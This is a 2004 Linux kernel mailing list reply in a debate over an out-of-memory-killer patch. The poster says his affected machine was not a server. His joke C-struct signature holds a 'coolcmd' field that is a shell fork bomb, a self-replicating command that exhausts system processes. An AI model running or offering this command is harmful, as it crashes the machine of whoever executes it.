Re: [PATCH] oom_pardon, aka don't kill my xlock

From: Thomas Habets
Date: Mon Sep 27 2004 - 07:03:16 EST

> What we need is a mechanism to have a giant brainstraw emerge from the
> front casing of the machine and suck the brains out of the guy running
> a server with overcommit issues.

So the way to deal with OOM-killer issues is to laugh at people who encounter
it? How very openbsd of you.

And I don't run X or xlock on any of my servers. IOW: this was not a server.

typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "thomas@xxxxxxxxxxxx" };
char kernel[] = { "Linux" };
char *pgpKey[] = { ""; };
char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;

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